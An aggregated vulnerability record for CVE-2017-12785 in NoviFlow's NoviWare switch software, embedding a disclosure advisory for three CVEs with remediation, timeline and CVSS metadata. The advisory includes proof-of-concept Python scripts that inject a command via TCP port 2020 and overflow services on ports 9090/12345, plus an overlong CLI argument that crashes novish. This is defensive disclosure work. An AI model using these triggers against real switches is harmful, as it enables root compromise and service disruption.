ID

VAR-201708-1145


CVE

CVE-2017-12785


TITLE

NoviWare Buffer error vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2017-007313

DESCRIPTION

The novish command-line interface, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, is prone to a buffer overflow in the "show log cli" command. This could be used by a read-only user (monitor role) to gain privileged (root) code execution on the switch via command injection. NoviWare contains a buffer error vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS).

NoviFlow NoviWare <= NW400.2.6 multiple vulnerabilities

Introduction
============

NoviWare is a high-performance OpenFlow 1.3, 1.4 and 1.5 compliant switch software developed by NoviFlow and available for license to network equipment manufacturers. Multiple vulnerabilities were identified in the NoviWare software deployed on NoviSwitch devices.

CVEs
====

* CVE-2017-12784: remote code execution in novi_process_manager_daemon
  Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
* CVE-2017-12785: cli breakout in novish
  Indicative CVSS v2 base score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)
* CVE-2017-12786: remote code execution in noviengine and cliengine
  Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)

Affected versions
=================

NoviWare <= NW400.2.6 and devices where a vulnerable NoviWare version is deployed

Author
======

François Goichon - Google Security Team

CVE-2017-12784
==============

Remote code execution in novi_process_manager_daemon

Summary
-------

The NoviWare switching software distribution is prone to two distinct bugs which could potentially allow a remote, unauthenticated attacker to gain privileged (root) code execution on the switch device.

- A flaw when applying ACL changes requested from the CLI could expose the novi_process_manager_daemon network service
- This network service is prone to command injection and a stack-based buffer overflow

Reproduction
------------

If TCP port 2020 is accepting connections from the network, the following python script can be used to ping yourself on vulnerable versions:

---
from struct import pack
import socket

s = socket.socket()
s.connect((<switch host>, 2020))
payload = pack("<I", 0xffffffff).ljust(0x24) + "ping <your ip>; echo\x00"
s.sendall(pack("<II", 1, len(payload)+8))
s.sendall(payload)
s.close()
---

On vulnerable versions, the appliance will perform an ICMP request to the specified IP, which can be observed in network logs.

Remediation
-----------

- Upgrade to NoviWare400 3.0 or later.
- NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com.

CVE-2017-12785
==============

cli breakout in novish

Reproduction
------------

Log in to the appliance via SSH and run the following command from the CLI:

--
noviswitch# show log cli username AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
--

If the appliance is vulnerable, the cli crashes and the session ends.

Remediation
-----------

- Upgrade to NoviWare400 3.0 or later.
- NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com.

CVE-2017-12786
==============

Remote code execution in noviengine and cliengine

Summary
-------

- A flaw when applying ACL changes requested from the CLI could expose noviengine and cliengine network services
- These network services are prone to a stack-based buffer overflow when unpacking serialized values.

Reproduction
------------

If TCP ports 9090 or 12345 are accepting connections from the network, the following python script can be used to cause a crash on vulnerable versions:

---
from struct import pack
import socket

s = socket.socket()
s.connect((<switch host>, <9090 or 12345>))
payload = "".join([pack("<I", 4) + "AAAA" for i in xrange(408)])
payload = pack("<IIQ", 0, len(payload) + 16, 0) + payload
s.sendall(payload)
s.recv(1)
s.close()
---

A watchdog should restart the service if it has crashed.

Remediation
-----------

- Upgrade to NoviWare400 3.0 or later.
- NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com.

Disclosure timeline
===================

2017/05/11 - Report sent to NoviFlow
2017/05/26 - Bugs acknowledged and remediation timeline confirmed
2017/07/27 - NoviWare400 3.0 release fixes all the above vulnerabilities
2017/08/09 - CVE requests
2017/08/16 - Public disclosure

Trust: 1.8

sources: NVD: CVE-2017-12785 // JVNDB: JVNDB-2017-007313 // VULMON: CVE-2017-12785 // PACKETSTORM: 143818

AFFECTED PRODUCTS

vendor: noviflow, model: noviware, scope: lte, version: 400.2.6

Trust: 1.0

vendor: noviflow, model: noviware, scope: lte, version: nw400.2.6

Trust: 0.8

vendor: noviflow, model: noviware, scope: eq, version: 400.2.6

Trust: 0.6

sources: JVNDB: JVNDB-2017-007313 // CNNVD: CNNVD-201708-459 // NVD: CVE-2017-12785

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2017-12785
value: CRITICAL

Trust: 1.0

NVD: CVE-2017-12785
value: CRITICAL

Trust: 0.8

CNNVD: CNNVD-201708-459
value: CRITICAL

Trust: 0.6

VULMON: CVE-2017-12785
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2017-12785
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

nvd@nist.gov: CVE-2017-12785
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 5.9
version: 3.0

Trust: 1.8

sources: VULMON: CVE-2017-12785 // JVNDB: JVNDB-2017-007313 // CNNVD: CNNVD-201708-459 // NVD: CVE-2017-12785

PROBLEMTYPE DATA

problemtype:CWE-119

Trust: 1.8

sources: JVNDB: JVNDB-2017-007313 // NVD: CVE-2017-12785

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201708-459

TYPE

buffer overflow

Trust: 0.6

sources: CNNVD: CNNVD-201708-459

CONFIGURATIONS

sources: JVNDB: JVNDB-2017-007313

EXPLOIT AVAILABILITY

sources: VULMON: CVE-2017-12785

PATCH

title: NoviWare, url: https://noviflow.com/products/noviware/

Trust: 0.8

sources: JVNDB: JVNDB-2017-007313

EXTERNAL IDS

db: NVD, id: CVE-2017-12785

Trust: 2.6

db: EXPLOIT-DB, id: 42518

Trust: 2.5

db: JVNDB, id: JVNDB-2017-007313

Trust: 0.8

db: CNNVD, id: CNNVD-201708-459

Trust: 0.6

db: VULMON, id: CVE-2017-12785

Trust: 0.1

db: PACKETSTORM, id: 143818

Trust: 0.1

sources: VULMON: CVE-2017-12785 // JVNDB: JVNDB-2017-007313 // PACKETSTORM: 143818 // CNNVD: CNNVD-201708-459 // NVD: CVE-2017-12785

REFERENCES

url:https://www.exploit-db.com/exploits/42518/

Trust: 2.6

url:https://nvd.nist.gov/vuln/detail/cve-2017-12785

Trust: 0.9

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12785

Trust: 0.8

url:https://cwe.mitre.org/data/definitions/119.html

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2017-12787

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2017-12786

Trust: 0.1

sources: VULMON: CVE-2017-12785 // JVNDB: JVNDB-2017-007313 // PACKETSTORM: 143818 // CNNVD: CNNVD-201708-459 // NVD: CVE-2017-12785

CREDITS

Francois Goichon

Trust: 0.1

sources: PACKETSTORM: 143818

SOURCES

db: VULMON, id: CVE-2017-12785
db: JVNDB, id: JVNDB-2017-007313
db: PACKETSTORM, id: 143818
db: CNNVD, id: CNNVD-201708-459
db: NVD, id: CVE-2017-12785

LAST UPDATE DATE

2025-04-20T23:04:26.327000+00:00


SOURCES UPDATE DATE

db: VULMON, id: CVE-2017-12785, date: 2017-08-29T00:00:00
db: JVNDB, id: JVNDB-2017-007313, date: 2017-09-19T00:00:00
db: CNNVD, id: CNNVD-201708-459, date: 2017-08-23T00:00:00
db: NVD, id: CVE-2017-12785, date: 2025-04-20T01:37:25.860

SOURCES RELEASE DATE

db: VULMON, id: CVE-2017-12785, date: 2017-08-22T00:00:00
db: JVNDB, id: JVNDB-2017-007313, date: 2017-09-19T00:00:00
db: PACKETSTORM, id: 143818, date: 2017-08-18T23:44:44
db: CNNVD, id: CNNVD-201708-459, date: 2017-08-11T00:00:00
db: NVD, id: CVE-2017-12785, date: 2017-08-22T17:29:00.193